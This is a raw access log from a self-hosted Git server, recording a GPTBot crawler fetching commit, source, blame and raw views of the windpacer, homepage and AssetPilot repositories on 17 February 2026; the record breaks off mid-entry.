"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" -[17/Feb/2026:15:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:15:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json?display=source" [Client 74.7.227.38] [Length 11683] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" -[17/Feb/2026:15:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10843] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" -[17/Feb/2026:15:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" -[17/Feb/2026:15:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json?display=source" [Client 74.7.227.38] [Length 11684] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" -[17/Feb/2026:15:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" -[17/Feb/2026:15:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" -[17/Feb/2026:15:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" -[17/Feb/2026:15:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json?display=source" [Client 74.7.227.38] [Length 11020] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" -[17/Feb/2026:15:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10846] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" -[17/Feb/2026:15:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10842] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" -[17/Feb/2026:15:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11251] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" -[17/Feb/2026:15:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json?display=source" [Client 74.7.227.38] [Length 11654] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" -[17/Feb/2026:15:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" -[17/Feb/2026:15:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json?display=source" [Client 74.7.227.38] [Length 11682] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" -[17/Feb/2026:15:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10267] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11402] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" -[17/Feb/2026:15:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f.vscode" [Client 74.7.227.38] [Length 21470] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" -[17/Feb/2026:15:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fstatus.json" [Client 74.7.227.38] [Length 19061] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:15:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fstatus.json" [Client 74.7.227.38] [Length 21732] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:15:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20343] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15802] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" -[17/Feb/2026:15:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15797] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" -[17/Feb/2026:15:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fdcsintegration.png" [Client 74.7.227.38] [Length 19813] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" -[17/Feb/2026:15:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" -[17/Feb/2026:15:23:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" -[17/Feb/2026:15:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:15:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fstatus.json" [Client 74.7.227.38] [Length 18623] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" -[17/Feb/2026:15:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10462] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2findex.tsx" [Client 74.7.227.38] [Length 23403] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" -[17/Feb/2026:15:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43127] [Gzip 20.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:23:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 19269] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" -[17/Feb/2026:15:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2fREADME.md" [Client 74.7.227.38] [Length 23587] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/README.md" -[17/Feb/2026:15:23:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2ftypes.ts" [Client 74.7.227.38] [Length 23302] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/types.ts" -[17/Feb/2026:15:23:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11603] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:23:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11573] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:23:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 11602] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:15:23:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibiconv-2.dll" [Client 74.7.227.38] [Length 23756] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libiconv-2.dll" -[17/Feb/2026:15:23:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fuser_assets.csv" [Client 74.7.227.38] [Length 22675] [Gzip 4.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/user_assets.csv" -[17/Feb/2026:15:23:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2fassets_data.csv" [Client 74.7.227.38] [Length 22703] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/assets_data.csv" -[17/Feb/2026:15:23:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=PostgresWatchdog%2flibintl-8.dll" [Client 74.7.227.38] [Length 23755] [Gzip 4.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/libintl-8.dll" -[17/Feb/2026:15:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2f.python-version" [Client 74.7.227.38] [Length 20246] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/.python-version" -[17/Feb/2026:15:23:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild_exe.bat" [Client 74.7.227.38] [Length 23050] [Gzip 4.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build_exe.bat" -[17/Feb/2026:15:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 9962] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10940] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10917] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:15:23:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" [Client 74.7.227.38] [Length 10941] 